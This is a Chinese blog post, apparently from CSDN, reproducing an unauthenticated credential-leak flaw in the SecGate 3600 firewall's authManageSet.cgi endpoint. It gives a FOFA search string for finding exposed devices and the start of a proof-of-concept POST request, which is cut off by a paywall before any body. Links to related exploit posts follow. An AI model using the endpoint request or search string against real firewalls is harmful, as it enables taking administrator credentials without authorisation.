网神 SecGate3600 authManageSet.cgi信息泄露漏洞

最新推荐文章于 2024-10-04 11:45:30 发布
最新推荐文章于 2024-10-04 11:45:30 发布
阅读量71 收藏
点赞数
分类专栏: 漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/136588634
版权

产品简介
网神 SecGate 3600是基于状态检测包过滤和应用级代理的复合型硬件防火墙。
漏洞描述
网神SecGate 3600 authManageSet.cgi 接口存在敏感信息泄露漏洞,未授权得攻击者可以通过此漏洞获取控制台管理员用户名密码等凭据,可登录控制整个后台。
fofa
title=”网神SecGate 3600防火墙”
漏洞复现

POST /cgi-bin/authUser/authManageSet.cgi HTTP/1.1
Host: 
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: clos
了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
专栏目录
订阅专栏
网神 SecGate3600 authManageSet.cgi信息泄露漏洞复现
0xSec
12-13 1211
网神SecGate 3600authManageSet.cgi 接口存在敏感信息泄露漏洞,未授权得攻击者可以通过此漏洞获取控制台管理员用户名密码等凭据,可登录控制整个后台,使系统处于极不安全的状态
漏洞情报-某神SecGate3600 authManageSet.cgi信息泄露漏洞
qq_52612931的博客
01-02 625
微信公众号:不秃头的安全
POC漏洞复现
m0_56214376的博客
03-12 642
验证POC
网神 SecGate3600 authManageSet.cgi信息泄露漏洞(含批量验证poc)
weixin_43567873的博客
04-05 70
网神 SecGate3600 authManageSet.cgi信息泄露漏洞(含批量验证poc)
奇安信网神SecGate3600防火墙authManageSet.cgi接口登录绕过
weixin_43567873的博客
03-08 327
奇安信网神SecGate3600防火墙authManageSet.cgi接口登录绕过
奇安信网神SecGate3600防火墙authManageSet.cgi 接口登录绕过(含批量验证poc)
weixin_43567873的博客
04-04 180
奇安信网神SecGate3600防火墙authManageSet.cgi 接口登录绕过(含批量验证poc)
漏洞复现-网神SecGate3600防火墙敏感信息泄露漏洞(附漏洞检测脚本)
jjjj1029056414的博客
12-16 1061
漏洞复现-网神SecGate3600防火墙敏感信息泄露漏洞,附带自己写的poc脚本
网神 SecGate 3600 防火墙任意文件上传漏洞复现
0xSec
08-10 3672
网神 SecGate 3600 防火墙 obj_app_upfile 接口存在任意文件上传漏洞,未经授权的攻击者通过漏洞可以上传任意文件,获取服务器权限。
端口隔离配置的实验
zhgjx_ywz的博客
09-28 735
LSW1-GigabitEthernet0/0/4]am isolate GigabitEthernet 0/0/5 // g0/0/4的报文不能发给g0/0/5,g0/0/5的报文可以发给g0/0/4。综上所述,端口隔离配置是一种有效的网络安全措施,可以在不增加VLAN资源消耗的情况下实现端口间的隔离和控制。在VLAN20中,PC4主机存在安全隐患,往其他主机发送大量的广播报文,通过配置接口间的单向隔离来实现其他主机对该主机报文的隔离。3、配置PC1、PC2、PC3、PC4、PC5。
【网络安全】Cookie与ID未强绑定导致账户接管
等风来
10-02 188
DigiLocker 是一项在线服务,旨在为公民提供一个安全的数字平台,用于存储和访问重要的文档,如 Aadhaar 卡、PAN 卡和成绩单等。DigiLocker 通过多因素身份验证(MFA)来保护用户账户安全,通常包括 6 位数的安全 PIN 和一次性密码(OTP)验证。
网络安全:保护您的数字世界
不迁怒,不贰过。小知识,大智慧。
09-29 1139
在当今数字化时代,网络安全已经成为每个人都应该关注的重要议题。随着互联网的普及和信息技术的快速发展,我们的个人信息、财务数据甚至国家安全都面临着来自网络的威胁。网络攻击日益猖獗,黑客利用漏洞和技术手段,威胁着我们的数字世界的安全。在这个信息爆炸的时代,数据的泄露和被篡改可能带来严重的后果,影响个人隐私、金融安全甚至国家稳定。因此,保护我们的数字世界免受网络攻击变得至关重要。本文将探讨网络安全的重要性,介绍网络安全的基本概念和最佳实践,帮助读者更好地了解如何保护自己在数字世界中的安全。让我们共同努力,建立一个
信息安全工程师(24)网络安全体系建设原则与安全策略
m0_73399576的博客
09-28 1274
信息安全工程师——网络安全体系建设原则与安全策略篇
web安全】——sql注入
wxh的博客
09-27 1399
在mysql5版本以后,为了方便管理,默认定义了information_schema数据库,用来存储数据库元数据信息。schemata(数据库名)、tables(表名tableschema)、columns(列名或字段名)。
从《GTA5》的反外挂斗争看网络安全的重要性
@云安全小杜
09-26 948
本文将探讨《GTA5》在对抗外挂过程中遇到的挑战,特别是当游戏开发者试图增强游戏安全性时所遭受的DDoS攻击,并从中提炼出对于网络安全的一些启示。然而,随着游戏人气的增长,一些不法分子开始利用技术手段制作并销售外挂程序,这些程序可以让使用者在游戏中获得不公平的优势,从而破坏了游戏环境。请注意,以上内容是基于假设的情景编写的技术分析文章,实际案例可能涉及更多的细节和技术层面的问题。《GTA5》与外挂之间的斗争提醒我们,在享受数字世界带来的便利的同时,也需要时刻警惕潜在的安全风险,并积极采取措施加以防范。
Web安全 - 重放攻击(Replay Attack)
小工匠
10-01 1213
重放攻击(Replay Attack)是一种网络攻击方式,攻击者通过截取并重复发送已经捕获的合法通信数据包,企图在受害者不知情的情况下冒充合法用户进行操作。这种攻击常见于不安全的网络协议中,攻击者无需破解通信内容,只需重发合法的消息即可造成安全威胁。重放攻击的潜在危害包括:未授权的交易执行、非法获取资源、数据泄露以及系统篡改等。随着网络系统的日益复杂,重放攻击仍然是一个常见的威胁,尤其是在不具备防御机制的旧协议或自定义通信方案中。使用缓存减少存储开销。利用异步处理避免阻塞主线程。
Web安全 - 路径穿越(Path Traversal)
小工匠
10-02 2276
路径穿越(Path Traversal)是一种Web应用漏洞,攻击者通过操控输入文件路径参数,以访问系统上未经授权的文件。通过路径穿越,攻击者可以使用诸如../的相对路径绕过访问限制,读取系统敏感信息或修改配置文件。
Web安全 - 服务端请求伪造SSRF(Server-Side Request Forgery)
小工匠
09-29 1601
SSRF攻击的本质是利用服务器作为代理,发送请求到攻击者指定的目标(如内部网络资源、外部服务等),从而绕过客户端的防火墙、访问控制或认证机制。例如,代理在处理本地IP请求时,触发安全告警。若代理未能正确过滤和验证请求内容,攻击者可能通过代理访问不受控制的资源,或借助代理规避安全限制。:某些Web应用将对外服务作为身份验证的依赖(例如OAuth),SSRF攻击可以伪造服务器请求,以获取未授权的访问。:对所有代理请求使用安全令牌或密钥验证,并模拟攻击者尝试绕过验证过程,确保代理可以识别并阻止非法请求。
选择网络安全模式启动Windows系统,解决PC无法连接网络问题
最新发布
dvlinker的技术专栏
10-04 1361
选择网络安全模式启动Windows系统,解决PC无法连接网络问题。
网神SecGate 3600防火墙V6.1.14/6.90.14配置详解
该指南针对网神SecGate 3600防火墙的两个版本——V6.1.14和6.90.14-6.91.14,提供了全面的配置步骤和信息,适用于2022年12月7日至2023年11月22日期间。这份文档由奇安信集团官方发布,包含了版权声明和免责声明,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值